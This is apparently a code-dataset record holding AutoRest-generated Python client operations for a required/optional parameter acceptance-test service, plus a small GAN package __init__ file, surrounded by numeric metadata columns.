| 0.00725
| 0.031389
| 0.835039
| 0.820624
| 0.808683
| 0.80348
| 0.797339
| 0.777806
| 0
| 0.022264
| 0.383902
| 24,277
| 599
| 157
| 40.529215
| 0.761583
| 0.039091
| 0
| 0.771739
| 0
| 0.004348
| 0.075487
| 0.0122
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023913
| false
| 0
| 0.032609
| 0
| 0.067391
| 0.095652
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48d4dff0b9105dcab493eec407a97401ebd41075
| 43,108
|
py
|
Python
|
test/vanilla/Expected/AcceptanceTests/RequiredOptional/requiredoptional/operations/explicit_operations.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
test/vanilla/Expected/AcceptanceTests/RequiredOptional/requiredoptional/operations/explicit_operations.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
test/vanilla/Expected/AcceptanceTests/RequiredOptional/requiredoptional/operations/explicit_operations.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class ExplicitOperations(object):
"""ExplicitOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def post_required_integer_parameter(
self, body_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required integer. Please put null and the client
library should throw before the request is sent.
:param body_parameter:
:type body_parameter: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_integer_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'int')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_integer_parameter.metadata = {'url': '/reqopt/requied/integer/parameter'}
def post_optional_integer_parameter(
self, body_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional integer. Please put null.
:param body_parameter:
:type body_parameter: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_integer_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'int')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_integer_parameter.metadata = {'url': '/reqopt/optional/integer/parameter'}
def post_required_integer_property(
self, value, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required integer. Please put a valid int-wrapper with
'value' = null and the client library should throw before the request
is sent.
:param value:
:type value: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = models.IntWrapper(value=value)
# Construct URL
url = self.post_required_integer_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'IntWrapper')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_integer_property.metadata = {'url': '/reqopt/requied/integer/property'}
def post_optional_integer_property(
self, value=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional integer. Please put a valid int-wrapper with
'value' = null.
:param value:
:type value: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = None
if value is not None:
body_parameter = models.IntOptionalWrapper(value=value)
# Construct URL
url = self.post_optional_integer_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'IntOptionalWrapper')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_integer_property.metadata = {'url': '/reqopt/optional/integer/property'}
def post_required_integer_header(
self, header_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required integer. Please put a header 'headerParameter'
=> null and the client library should throw before the request is sent.
:param header_parameter:
:type header_parameter: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_integer_header.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['headerParameter'] = self._serialize.header("header_parameter", header_parameter, 'int')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_integer_header.metadata = {'url': '/reqopt/requied/integer/header'}
def post_optional_integer_header(
self, header_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional integer. Please put a header 'headerParameter'
=> null.
:param header_parameter:
:type header_parameter: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_integer_header.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if header_parameter is not None:
header_parameters['headerParameter'] = self._serialize.header("header_parameter", header_parameter, 'int')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_integer_header.metadata = {'url': '/reqopt/optional/integer/header'}
def post_required_string_parameter(
self, body_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required string. Please put null and the client library
should throw before the request is sent.
:param body_parameter:
:type body_parameter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_string_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_string_parameter.metadata = {'url': '/reqopt/requied/string/parameter'}
def post_optional_string_parameter(
self, body_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional string. Please put null.
:param body_parameter:
:type body_parameter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_string_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'str')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_string_parameter.metadata = {'url': '/reqopt/optional/string/parameter'}
def post_required_string_property(
self, value, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required string. Please put a valid string-wrapper with
'value' = null and the client library should throw before the request
is sent.
:param value:
:type value: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = models.StringWrapper(value=value)
# Construct URL
url = self.post_required_string_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'StringWrapper')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_string_property.metadata = {'url': '/reqopt/requied/string/property'}
def post_optional_string_property(
self, value=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional integer. Please put a valid string-wrapper
with 'value' = null.
:param value:
:type value: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = None
if value is not None:
body_parameter = models.StringOptionalWrapper(value=value)
# Construct URL
url = self.post_optional_string_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'StringOptionalWrapper')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_string_property.metadata = {'url': '/reqopt/optional/string/property'}
def post_required_string_header(
self, header_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required string. Please put a header 'headerParameter'
=> null and the client library should throw before the request is sent.
:param header_parameter:
:type header_parameter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_string_header.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['headerParameter'] = self._serialize.header("header_parameter", header_parameter, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_string_header.metadata = {'url': '/reqopt/requied/string/header'}
def post_optional_string_header(
self, body_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional string. Please put a header 'headerParameter'
=> null.
:param body_parameter:
:type body_parameter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_string_header.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if body_parameter is not None:
header_parameters['bodyParameter'] = self._serialize.header("body_parameter", body_parameter, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_string_header.metadata = {'url': '/reqopt/optional/string/header'}
def post_required_class_parameter(
self, body_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required complex object. Please put null and the client
library should throw before the request is sent.
:param body_parameter:
:type body_parameter: ~requiredoptional.models.Product
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_class_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'Product')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_class_parameter.metadata = {'url': '/reqopt/requied/class/parameter'}
def post_optional_class_parameter(
self, body_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional complex object. Please put null.
:param body_parameter:
:type body_parameter: ~requiredoptional.models.Product
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_class_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'Product')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_class_parameter.metadata = {'url': '/reqopt/optional/class/parameter'}
def post_required_class_property(
self, value, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required complex object. Please put a valid
class-wrapper with 'value' = null and the client library should throw
before the request is sent.
:param value:
:type value: ~requiredoptional.models.Product
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = models.ClassWrapper(value=value)
# Construct URL
url = self.post_required_class_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'ClassWrapper')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_class_property.metadata = {'url': '/reqopt/requied/class/property'}
def post_optional_class_property(
self, value=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional complex object. Please put a valid
class-wrapper with 'value' = null.
:param value:
:type value: ~requiredoptional.models.Product
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = None
if value is not None:
body_parameter = models.ClassOptionalWrapper(value=value)
# Construct URL
url = self.post_optional_class_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'ClassOptionalWrapper')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_class_property.metadata = {'url': '/reqopt/optional/class/property'}
def post_required_array_parameter(
self, body_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required array. Please put null and the client library
should throw before the request is sent.
:param body_parameter:
:type body_parameter: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_array_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, '[str]')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_array_parameter.metadata = {'url': '/reqopt/requied/array/parameter'}
def post_optional_array_parameter(
self, body_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional array. Please put null.
:param body_parameter:
:type body_parameter: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_array_parameter.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, '[str]')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_array_parameter.metadata = {'url': '/reqopt/optional/array/parameter'}
def post_required_array_property(
self, value, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required array. Please put a valid array-wrapper with
'value' = null and the client library should throw before the request
is sent.
:param value:
:type value: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = models.ArrayWrapper(value=value)
# Construct URL
url = self.post_required_array_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body_parameter, 'ArrayWrapper')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_array_property.metadata = {'url': '/reqopt/requied/array/property'}
def post_optional_array_property(
self, value=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional array. Please put a valid array-wrapper with
'value' = null.
:param value:
:type value: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
body_parameter = None
if value is not None:
body_parameter = models.ArrayOptionalWrapper(value=value)
# Construct URL
url = self.post_optional_array_property.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if body_parameter is not None:
body_content = self._serialize.body(body_parameter, 'ArrayOptionalWrapper')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_array_property.metadata = {'url': '/reqopt/optional/array/property'}
def post_required_array_header(
self, header_parameter, custom_headers=None, raw=False, **operation_config):
"""Test explicitly required array. Please put a header 'headerParameter'
=> null and the client library should throw before the request is sent.
:param header_parameter:
:type header_parameter: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Error or ClientRawResponse if raw=true
:rtype: ~requiredoptional.models.Error or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_required_array_header.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['headerParameter'] = self._serialize.header("header_parameter", header_parameter, '[str]', div=',')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code < 200 or response.status_code >= 300:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_required_array_header.metadata = {'url': '/reqopt/requied/array/header'}
def post_optional_array_header(
self, header_parameter=None, custom_headers=None, raw=False, **operation_config):
"""Test explicitly optional integer. Please put a header 'headerParameter'
=> null.
:param header_parameter:
:type header_parameter: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<requiredoptional.models.ErrorException>`
"""
# Construct URL
url = self.post_optional_array_header.metadata['url']
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if header_parameter is not None:
header_parameters['headerParameter'] = self._serialize.header("header_parameter", header_parameter, '[str]', div=',')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
post_optional_array_header.metadata = {'url': '/reqopt/optional/array/header'}
| 41.172875
| 129
| 0.672219
| 4,520
| 43,108
| 6.22677
| 0.034513
| 0.040647
| 0.038408
| 0.025759
| 0.94777
| 0.928549
| 0.912489
| 0.911707
| 0.899449
| 0.897708
| 0
| 0.003568
| 0.245824
| 43,108
| 1,046
| 130
| 41.212237
| 0.862139
| 0.363622
| 0
| 0.778571
| 0
| 0
| 0.07557
| 0.028485
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054762
| false
| 0
| 0.004762
| 0
| 0.116667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b126ba82c96d392475f45273dc5ec56ab0b82a3
| 57
|
py
|
Python
|
model/__init__.py
|
wuchangsheng951/Conditional-GAN
|
913d46ff2ea15f54db1790ec35b57e6e0fe03360
|
[
"MIT"
] | null | null | null |
model/__init__.py
|
wuchangsheng951/Conditional-GAN
|
913d46ff2ea15f54db1790ec35b57e6e0fe03360
|
[
"MIT"
] | null | null | null |
model/__init__.py
|
wuchangsheng951/Conditional-GAN
|
913d46ff2ea15f54db1790ec35b57e6e0fe03360
|
[
"MIT"
] | null | null | null |
from .GD import Discriminator
from .GD import Generator
| 14.25
| 29
| 0.807018
| 8
| 57
| 5.75
| 0.625
| 0.26087
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 57
| 3
| 30
| 19
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
